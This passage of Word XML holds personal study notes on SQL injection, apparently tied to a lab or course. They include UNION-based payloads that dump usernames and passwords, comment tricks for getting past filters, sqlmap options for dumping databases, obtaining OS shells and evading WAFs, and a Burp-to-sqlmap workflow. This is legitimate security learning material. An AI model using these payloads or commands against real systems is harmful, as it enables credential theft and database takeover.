        <w:t>etc. until all columns have been tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C28E4" w14:textId="270B1CFE" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>no eroor = data type is useful for string extraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70640327" w14:textId="64379ECD" w:rsidR="00464787" w:rsidRDefault="00464787" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using an SQL injection UNION attack to retrieve interesting data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D40B45" w14:textId="1C204A38" w:rsidR="00464787" w:rsidRDefault="00A9593E" w:rsidP="00464787">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>retrieve contents from table using</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCC1133" w14:textId="433A7967" w:rsidR="00A9593E" w:rsidRDefault="00A9593E" w:rsidP="00A9593E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>‘ UNION SELECT &lt;column 1&gt;,&lt;column 2&gt; FROM &lt;table&gt; - -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550400E" w14:textId="15DF4C08" w:rsidR="00A9593E" w:rsidRDefault="00A9593E" w:rsidP="00A9593E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>if an error is thrown when using - -, add an additional comment</w:t>
      </w:r>
      <w:r w:rsidR="00C34F45">
        <w:t xml:space="preserve"> such as // or /* to potentially bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32748DFF" w14:textId="70484DF5" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00A9593E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00C34F45">
        <w:t>' union select null, id, username, password, fname from users -- //</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E3A904" w14:textId="6213BEBE" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>dump all users and passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5B9B99" w14:textId="0BC6D6DF" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>replace NULL values with SQL keywords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662DE28E" w14:textId="4CB6231E" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E0268" w14:textId="694ED4E0" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>user()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104996A1" w14:textId="6AA06BB3" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>@@version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2750B2E8" w14:textId="04DB93C4" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C08717" w14:textId="11AB5524" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EE0DB5" w14:textId="1992F37F" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35940636" w14:textId="2A895DE2" w:rsidR="00C34F45" w:rsidRDefault="00C34F45" w:rsidP="00C34F45">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>column_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E37F4A" w14:textId="1ABFC939" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Automating Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A975C0F" w14:textId="1CE873CF" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CAF91BC" w14:textId="6FD2FD88" w:rsidR="00E44A84" w:rsidRDefault="007A6E65" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId39" w:history="1">
        <w:r w:rsidR="00E44A84" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://sqlmap.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A73309E" w14:textId="2242D3DE" w:rsidR="00E44A84" w:rsidRDefault="007A6E65" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:history="1">
        <w:r w:rsidR="00E44A84" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/sqlmapproject/sqlmap</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15783907" w14:textId="46478607" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>automates process of detecting and exploiting SQL injection flaws and taking over database servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ED99B4" w14:textId="7CD99BFA" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E44A84">
        <w:t>git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4341B9F6" w14:textId="1618D9EB" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00E44A84">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Pure Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526CD666" w14:textId="304F29C5" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-u – set target URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68023472" w14:textId="4C47F6D1" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -dbms – provide back-end DBMS to exploit (MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12764DB8" w14:textId="7D31EF84" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -level=LEVEL – level of tests to perform (1-5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0D80D" w14:textId="0B1FD6BF" w:rsidR="00E44A84" w:rsidRDefault="00E44A84" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -</w:t>
      </w:r>
      <w:r w:rsidR="00CA54D4">
        <w:t>risk=RISK – risk of tests to perform (1-3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E2158" w14:textId="40028872" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -dump/dump-all – dump DBMS database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39517C" w14:textId="6A74CA52" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -passwords – enumerate DBMS users password hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D829823" w14:textId="2894796D" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -all – retrieve everything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630302CB" w14:textId="2C7226FE" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -os-shell – prompt for an interactive operating system shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324E97D2" w14:textId="22E2A5DA" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -os-pwn – prompt for an OOB shell, Meterpreter or VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C016972" w14:textId="36350EE5" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -batch – never ask for user input, use default behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C893066" w14:textId="20F1E368" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -wizard – simple wizard interface for beginner users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AADE1D2" w14:textId="6D2DF529" w:rsidR="00D67743" w:rsidRDefault="00D67743" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -dbs – list all databases on a site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17231577" w14:textId="799EF580" w:rsidR="00805886" w:rsidRDefault="00805886" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>- -tamper=space2comment – attempt to bypass WAF (Web Application Firewall)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A9F258" w14:textId="45168A20" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDD7CD" w14:textId="6692B851" w:rsidR="00CA54D4" w:rsidRDefault="007A6E65" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:history="1">
        <w:r w:rsidR="00CA54D4" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7885BB84" w14:textId="78F87656" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE0C291" w14:textId="60E4C0D7" w:rsidR="00CA54D4" w:rsidRDefault="007A6E65" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:history="1">
        <w:r w:rsidR="00CA54D4" w:rsidRPr="00F1758D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D86AE28" w14:textId="355C6C85" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Burpsuite + Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBFB9D" w14:textId="21AF702E" w:rsidR="00CA54D4" w:rsidRDefault="00CA54D4" w:rsidP="00CA54D4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Allows automatic processing and exploitation of requests taken from Burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F6555" w14:textId="1B676BA3" w:rsidR="00442A8F" w:rsidRDefault="00442A8F" w:rsidP="00442A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>intercept GET request for URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69990A7A" w14:textId="555D41BF" w:rsidR="00442A8F" w:rsidRDefault="00442A8F" w:rsidP="00442A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. GET </w:t>
      </w:r>
      <w:r w:rsidRPr="00442A8F">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/sqli-labs/Less-1/index.php?id=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B017A5" w14:textId="728B8303" w:rsidR="00805886" w:rsidRDefault="00805886" w:rsidP="00805886">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Send to Repeater</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA77091" w14:textId="335BC2A6" w:rsidR="00442A8F" w:rsidRDefault="00442A8F" w:rsidP="00442A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>save item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624738F0" w14:textId="25C873FC" w:rsidR="00442A8F" w:rsidRDefault="00442A8F" w:rsidP="00442A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>go to request location (where saved) and open Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16165D0C" w14:textId="1A7787C2" w:rsidR="00442A8F" w:rsidRDefault="00442A8F" w:rsidP="00442A8F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>sqlmap -r &lt;saved request filename&gt; - -batch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769FDF7C" w14:textId="64DD68FF" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQLi Christmas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1E5209" w14:textId="7A8BC6CC" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL databases are a type of relational database widely utilised in web applications. There are several implementations of SQL servers available from vendors such as Microsoft and Oracle, as well as open-source products such as MariaDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F04C0" w14:textId="61FFCD70" w:rsidR="003C6045" w:rsidRDefault="003C6045" w:rsidP="003C6045">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
